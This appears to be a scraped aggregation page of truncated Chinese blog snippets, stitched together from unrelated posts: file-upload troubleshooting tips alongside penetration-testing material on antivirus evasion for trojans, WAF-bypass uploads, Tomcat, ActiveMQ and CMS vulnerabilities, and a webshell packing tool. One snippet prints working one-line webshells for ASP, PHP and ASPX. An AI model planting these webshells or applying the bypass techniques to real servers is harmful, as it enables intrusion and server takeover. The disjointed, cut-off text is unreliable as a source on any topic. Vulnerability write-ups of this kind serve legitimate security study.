http://qqhack8.blog.163.com/blog/static/114147985201126105626755/ 这是我2011年的东西了,当时用此方法可免杀很多马,至今依然有很大的用处 比如有一些WebShell,特别菜刀无法直接上传exe文件时(当然该工具可传任意文件) 可通过此方法向目标上传任意文件(菜刀下载功能不可用或没VPS做WEB下载的情况) 现在依旧可用于类似奇葩环境,特别是S2环境很多时候仅能上传文本 [原创]3KB大小 EXE转BAT 工具原理以及编写思路 2…
使用curl命令,将备份好的图片全部重新导入到seaweedfs,图片全部以存储在seaweedfs中的fid命令, fid中间有一个逗号,使用curl命令时报错: curl: (26) couldn't open file "6" curl命令: curl -X PUT -F "fileUpload=@6,f6f7219fc0" "http://192.168.0.168:8180/6,f6f7219fc0" 其中,http://192.168…
abp .net core使用ueditor遇到的问题:多图和上传文件无法上传,提示“http://请求错误”. 400 bad request解决办法: 因为abp默认启用了ValidateAntiForgeryToken 验证 所以在处理上传文件的action要禁用此验证,使用特性“IgnoreAntiforgeryToken”…
今天下午2点多,突然发现凡是文件超过100KB的,在上传的时候都会卡住,但低于100KB的文件可以上传成功. 服务器端使用的是asp无组件上传,为什么突然出现这种问题呢? 我们知道,IIS默认上传限制文件大小:200KB,我检查了一下system32\inesrv\metabase.xml文件的ASPMaxRequestEntityAllowed参数,设置:5M,看来不是这个原因. 还有什么原因呢,一时也查不到原因,只好联系机房,过了5分钟后,机房回复:“你的IP已从墙上释放,你试一下好了没有?…
Xcode自带的svn和Versions以及一些其它工具都默认ignore".a"文件. 解决办法有两个: 方法一:使用命令行添加文件([转]原文在这) 1.打开终端,输入cd,空格,然后将需要上传的.a文件所在的文件夹(不是.a文件)拖拽到终端(此办法无需输入繁琐的路径,快捷方便) ,回车:2.之后再输入如下命令:svn add libOCMock.a,回车:3.之后会出现:A  (bin)  libOCMock.a   表示添加成功,打开Versions就可以看到,刚才添加的.a文…
最近做项目的时候  用户提出要上传大图片  一张图片有可能十几兆  本来用的第三方的上传控件  有限制图片上传大小的设置 以前设置的是2M  按照用户的要求  以为直接将限制图片上传大小的设置改下就可以了  但是当上传大图片的时  总是异常: 错误消息:超过了最大请求长度 解决方案: 错误原因:asp.net默认最大上传文件大小为4M,运行超时时间为90S. 修改web.config中配置 <configuration> <system.web> <httpRuntime u…
在CornerStone中先选中左边的项目: 然后在菜单栏里面选择View->ShowIgnoreItems, 再选择项目中的library文件,点击Add按钮即可上传到服务器:…
当时文件始终上传不成功时(一般先update后commit): cvs update filename report:move away filename ,it is in the way cvs update 该文件所在的目录时 显示该文件的状态时C(即confilict文件报冲突) solution: 删除该文件,直接更新该文件. If you encounter this issue, please just delete your local files or folders firs…
I think that if u got a small /tmp like i had u cant upload big file…My /tmp = 462M so i can upload only file less or egal 500M. I input upload_tmp_dir = /var/www/nextcloud/data/upload-tmp in php.ini to use itmodify :upload_max_filesize = xxxGpost_ma…
0x01 写在前面 渗透过程中可能会经常遭遇WAF,此时不要轻易放弃,绞尽脑汁竭尽全力,或许弹尽粮绝之时也是柳暗花明之日. 0x02 过狗上传 一次项目渗透过程中,找个一处上传功能 先上传图片,测试上传功能是否正常 功能正常,那么我们尝试上传木马 出现了安全狗,asp后缀直接被拦截了,尝试asa后缀: 还是不行,再次尝试cer.cdx.aspx.asmx.ashx等后缀都失败了,网站中间件是IIS7.5,已测试不解析php,自然也不会有解析漏洞. 这个时候我们发现上传表单中存在filelx参数,…
为什么这个漏洞被称作 Ghostcat(幽灵猫)? 这个漏洞影响全版本默认配置下的 Tomcat(在我们发现此漏洞的时候,确认其影响 Tomcat 9/8/7/6 全版本,而年代过于久远的更早的版本未进行验证),这意味着它在 Tomcat 里已经潜伏了长达十多年的时间. Tomcat AJP Connector 是什么? Tomcat Connector 是 Tomcat 与外部连接的通道,它使得 Catalina 能够接收来自外部的请求,传递给对应的 Web 应用程序处理,并返回请求的响应结果…
上面这问题问得好  1 不知道大家有没碰到有些Strus2站点  上传JSP后访问404 或者503    注意我说的是404或503不是403(要是403换个css/img等目录或许可以)    但对于明明在web目录下放了jsp访问却404,怎么办?上exe 弄它啊 怎么办2 估计大部分人碰到的是可以上传小马无法上传大马 怎么办?3 碰到可上传菜刀马,但无法通过菜刀上传任何文件怎么办?4 比如通过菜刀传别的马进去JSP代码被截断了怎么办?5 或者说目标站点页面是XX语言,实施水坑,修改代码保…
文章作者:rebeyond 受影响版本:v6~v7 漏洞说明: JEECMS是国内Java版开源网站内容管理系统(java cms.jsp cms)的简称.该系统基于java技术开发,继承其强大.稳定.安全.高效.跨平台等多方面的优点:采用SpringMVC3+Spring3+Hibernate3+Freemarker主流技术架构.广泛应用于政府(部委和省级政府部门.市.县.乡及委办局).教育科研(大.中.小学及各地方教育局).电信运营商.金融(证券.保险及银行).企业(矿业.煤炭.旅游.石油集…
本文由红日安全成员: MisakiKata 编写,如有不当,还望斧正. 大家好,我们是红日安全-Web安全攻防小组.此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助.每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场.JAVA靶场.Python靶场基本上三种靶场全部涵盖)-实战演练(主要选择相应CMS或者是Vulnhub进行实战演练…
0X00 总体简介 云优CMS于2017年9月上线全新版本,二级域名分站,内容分站独立,七牛云存储,自定义字段,自定义表单,自定义栏目权限,自定义管理权限等众多功能深受用户青睐,上线短短3个月,下载次数已超过5万次.云优CMS坚信没有排名的网站不是“好网站”,我们将致力于为用户打造全自动SEO解决方案 此次审的版本为云优CMS v1.1.2,更新于2018.08.02. 发现了前台api模块Master.php,V1.php存在多个注入漏洞,与及statics\ueditor\vendor\Lo…
  0x00 环境准备 TuziCMS官网:http://www.tuzicms.com/ 网站源码版本:TuziCMS_v3.0_20161220 程序源码下载:http://www.tuzicms.com/index.php/download 测试网站首页: 0x01 代码分析 1.漏洞文件位置: \tuzicms\App\Manage\Controller\DatabaseController.class.php 第284-314行: (由于部分TuziCMS 采用zend解密,可使用如下…
0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/cltphp 默认后台地址: http://127.0.0.1/admin/login/index.html 默认账号密码: 后台登录名:admin 密码:admin123 测试网站首页: 0x01 代码分析 1.漏洞文件位置:/app/user/controller/UpFiles.php 第5-…
[CVE-2017-12615] Tomcat任意文件上传漏洞 首先先贴出wooyun上的一个案例:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html 看到这个漏洞让我想到了IIS6.0任意文件上传的漏洞,不过现在大多都用工具,比如IIS put scan... 这里贴出IIS6.0任意文件上传案例:https://blog.csdn.net/qq_42357070/article/details/82183988 能文件上…
ActiveMQ 反序列化漏洞(CVE-2015-5254) 漏洞详情 ActiveMQ启动后,将监听61616和8161两个端口,其中消息在61616这个端口进行传递,使用ActiveMQ这个中间件的程序也通过这个端口工作,8161是Web服务的端口,通过Web页面可管理ActiveMQ ActiveMQ反序列化漏洞存在于ActiveMQ5.13.0之前5.x版本中,该漏洞源于程序没有限制可在代理中序列化的类.远程攻击者可借助特制的序列化的Java Message Service(JMS)Ob…
0x01 前言 UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器,具有轻量.可定制.用户体验优秀等特点 ,被广大WEB应用程序所使用:本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响.漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危.由于时间仓促,本文分析不到位的地方还请多多谅解. 0x02 漏洞利用 笔者本地测试的编辑器是百度官方下载最新的版本1.4.3.3 http://uedi…
参考 http://prontosil.club/posts/c08799e1/ 一. 实验名称 企业环境渗透2 二. 实验目的 [实验描述] 操作机的操作系统是kali 进入系统后默认是命令行界面 输入startx命令即可打开图形界面. 所有需要用到的信息和工具都放在了/home/Hack 目录下. 本实验的任务是通过外网的两个主机通过代理渗透到内网的两个主机.在渗透的过程中一般需要先进行端口扫描猜测主机上运行的服务,再通过漏洞利用脚本和其他扫描工具进一步确定漏洞存在,进而完成主机渗透拿到权限…
任意文件上传漏洞 先来几个一句话木马看看 <%execute(request("value"))%> #asp木马 <?php eval($_POST["value"]);?> #php木马 <%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%> #aspx木马<?php echo file_get_con…
Java相关技术 - 文件内容检索工具 拿到一个几百M甚至上G的project让你去学习 有时候你会想知道某个关键词是在哪个文件里 比如:spring MVC配置的@RequestMapping,你从页面源知道了Action是 index/login.sftl 然后你想知道,这个@RequestMapping到底是配置在哪个Java类里,你怎么找到这个类呢 又比如,你想知道你当前看到的页面的源文件到底在项目的哪个路径下,你又要什么寻找 别告诉我,你会把项目里的文件一个个打开,直到找到你要的文件…
catalogue . 前言和技术背景 . Glassfish安装配置 . 漏洞利用 . 漏洞缓解(修复) 1. 前言和技术背景 0x1: GlassFish是什么 GlassFish 是用于构建 Java EE 5 应用服务器的开源开发项目的名称.它基于 Sun Microsystems 提供的 Sun Java System Application Server PE 9 的源代码以及 Oracle 贡献的 TopLink 持久性代码.该项目提供了开发高质量应用服务器的结构化过程,以前所未有…
1.目标站点 http://125.69.112.239/login.jsp 2.简单测试 发现是jboss,HEAD请求头绕过失败,猜测弱口令失败,发现没有删除 http://125.69.112.239/invoker/JMXInvokerServlet 这个是jboss的另一个漏洞了. 3.大家都懂这里简单分析一下 Jboss在默认安装的时候,会安装http-invoker.sar站点,其web.xml配置如下: 可知当请求invoker/JMXInvokerServlet或invoker…
0x00 前言 这段时间就一直在搞代码审计了.针对自己的审计方法做一下总结,记录一下步骤. 审计没他,基础要牢,思路要清晰,姿势要多且正. 下面是自己审计的步骤,正在逐步调整,寻求效率最高. 0x01 关于 XiaoCms XiaoCms 企业建站版基于 PHP+Mysql 架构 是一款小巧.灵活.简单.易用的轻量级 cms.能满足各种企业站 博客 等中小型站点.(此cms貌似已经停止更新了) 01. 支持自定义内容模型 通过自定义内容模型和自定义字段可以轻松简单的定制出各种内容模型 如新闻模块…
程序是事件驱动的,写博客是什么驱动的?事件? 时间?no,我承认我很懒,甚至不愿意记录总结.哪是什么驱动的? 对! 问题驱动的.遇到了问题解决了问题突然想起来搬到blog上,让遇到相同问题的可以参考下. 问题所在 我用的Electronic WeChat,当朋友发送文字.图片.甚至视频的时候都可以打开(Audio无法收听,因为电脑无外设音响/喇叭).但发来的语音就扯蛋了,只能通过手机听,甚至不能转发. 但是发现可以通过开发者工具看到http语音文件的请求地址. 直接复制url在浏览器中打开没有任…
[原创]K8PackWebShell ASPX整站打包工具[K.8](有无Rar执行权限都可以) 2011-06-11 01:49:21|  分类: 原创工具 Name: K8PackWebShell V1.0Team:  CrAcK8_编程小组[K.8]Blog: http://qqhack8.blog.163.com 功能简介:1 可选择.net自带zip类 或者 调用Winrar(可以是winrar.exe或Rar.exe)2 不输入打包路径  默认将打包本Shell所在的当前目录3 输出…
[原创]Robo 3T 1.2.1 工具使用介绍 1 Robo 3T 1.2.1  简介 robo 3t 是一款MongoDB的辅助插件,可以帮助您在管理数据库内容以及数据库代码编辑方面提供一定的开发优化方案,内置一个代码编辑区域,您可以将数据库文件放到软件上修改,结合图形化的处理方式,可以将MongoDB数据库中的文件转换为分布式的存储方式,提高数据文件编辑和保存效率,Robo 3T是Robomongo的升级版本,在新版中,您可以更加方便的查找数据库对象.利用其中的数据生成器,可以将Excel…
  0x00 环境准备 大米CMS官网:http://www.damicms.com 网站源码版本:大米CMS_V5.5.3试用版(更新时间:2017-04-15) 程序源码下载:http://www.damicms.com/downes/dami.rar 测试网站首页: 0x01 代码分析 1.漏洞文件位置:/Admin/Lib/Action/TplAction.class.php  第76-87行中: public function add() { $filename = dami_url_…